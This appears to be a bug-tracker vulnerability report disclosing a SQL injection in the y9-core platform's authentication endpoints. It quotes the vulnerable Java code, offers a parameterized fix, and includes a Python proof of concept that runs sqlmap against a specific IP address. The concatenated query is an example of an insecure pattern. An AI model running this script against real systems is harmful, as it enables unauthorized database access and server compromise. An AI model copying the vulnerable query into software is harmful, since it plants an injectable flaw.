Labels: bug (Something isn't working)
Description
Does this issue already exist?
- I have searched the existing issues (https://gitee.com/risesoft-y9/y9-core/issues)
How to reproduce
Summary
In the latest version, a parameter passed to the endpoint /server-platform/services/rest/auth/authenticate3 is user-controllable and not sanitized, and no prepared statement is used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.
The vulnerability also affects the following endpoints:
- /server-platform/services/rest/auth/authenticate5
- /server-platform/services/rest/v1/auth/authenticate3
Details
- SINK

```java
// source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java#L80C4-L84C5
public static List<String> getTenantByLoginName(String loginName) {
    // The caller's value is concatenated straight into the statement text;
    // a single quote in loginName terminates the literal and the rest is executed as SQL.
    String sql = "select id from Y9_COMMON_TENANT t where t.SHORT_NAME='" + loginName + "'";
    List<String> tenantIds = getJdbcTemplate4Public().queryForList(sql, String.class);
    return tenantIds;
}
```
- SOURCE

```java
// source-code/src/main/java/net/risesoft/api/v0/org/AuthenticateApiImpl.java#L29C4-L37C5
public Message authenticate3(@RequestParam("tenantShortName") @NotBlank String tenantShortName,
                             @RequestParam("loginName") @NotBlank String loginName,
                             @RequestParam("password") @NotBlank String password) {
    // tenantShortName comes directly from the request; @NotBlank only rejects empty values.
    List<String> tenantIds = Y9PlatformUtil.getTenantByLoginName(tenantShortName);
    if (!tenantIds.isEmpty()) {
        String tenantId = tenantIds.get(0);
        Y9LoginUserHolder.setTenantId(tenantId);
    }

    return this.authService.authenticate3(tenantShortName, loginName, password);
}
```
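As an added example (not the project's own fix), a parameterized rewrite of the sink above: the tenant short name is bound as a JDBC parameter instead of being concatenated into the statement. The `TenantLookup` class, constructor injection of `JdbcTemplate`, and the `SHORT_NAME` allow-list are assumptions; `queryForList(String, Class, Object...)` is Spring's standard overload.

```java
import java.util.List;
import java.util.regex.Pattern;
import org.springframework.jdbc.core.JdbcTemplate;

// Hardened replacement for Y9PlatformUtil.getTenantByLoginName (example, not the upstream patch).
public final class TenantLookup {

    // Assumption: tenant short names are plain identifiers. Adjust the allow-list to
    // match the values actually stored in Y9_COMMON_TENANT.SHORT_NAME.
    private static final Pattern SHORT_NAME = Pattern.compile("^[A-Za-z0-9_-]{1,64}$");

    private final JdbcTemplate jdbc;

    // Assumption: the JdbcTemplate is injected rather than fetched via getJdbcTemplate4Public().
    public TenantLookup(JdbcTemplate jdbc) {
        this.jdbc = jdbc;
    }

    public List<String> getTenantByLoginName(String loginName) {
        // Defence in depth: reject anything that cannot be a tenant short name
        // before it reaches the database at all.
        if (loginName == null || !SHORT_NAME.matcher(loginName).matches()) {
            throw new IllegalArgumentException("invalid tenant short name");
        }
        // The '?' placeholder is filled by the JDBC driver as a bound parameter, so
        // quote characters or SQL keywords in loginName are treated as data, not SQL.
        String sql = "select id from Y9_COMMON_TENANT t where t.SHORT_NAME = ?";
        return jdbc.queryForList(sql, String.class, loginName);
    }
}
```

The same change applies to every caller of the shared sink, so all three endpoints listed above are fixed at once.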
POC

```python
import os
import shlex
import shutil
import subprocess
import traceback

output_dir = r'/tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de'
os.makedirs(output_dir, exist_ok=False)
with open(os.path.join(output_dir, "__init__.py"), "w") as f:
    pass
with open(os.path.join(output_dir, "tamper.py"), "w") as f:
    f.write('')

# Raw HTTP request consumed by sqlmap -r (blank line separates headers from body).
request_text = r'''POST http://34.127.101.91:40103/server-platform/services/rest/auth/authenticate3 HTTP/1.1
Host: 34.127.101.91:40103
Content-type: application/x-www-form-urlencoded
User-agent: oxpecker
Content-length: 85

tenantShortName=test_tenant_short_name*&loginName=test_login&password=test_password'''
with open(os.path.join(output_dir, "request.txt"), "w") as f:
    f.write(request_text)

sqlmap_command_args = shlex.split(r'''sqlmap -r /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de/request.txt --level 5 --risk 3 -v 3 --threads 8 --output-dir /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de --answers="do you want to try URI injections in the target URL itself?=n,custom injection marker=y,skip test payloads specific for other DBMSes=y,is vulnerable. Do you want to keep testing the others=n" --current-user --flush-session --batch --ignore-stdin''')
print(subprocess.run(
    sqlmap_command_args,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,  # Merge stderr into stdout
    text=True,
    check=False,
    timeout=600
).stdout)

try:
    shutil.rmtree(output_dir)
except Exception:
    print(r"Failed to remove /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de")
    traceback.print_exc()
```
Expected result
NULL
Actual result
NULL
Screenshots or video
[Upload images here]
Version
<=9.6.7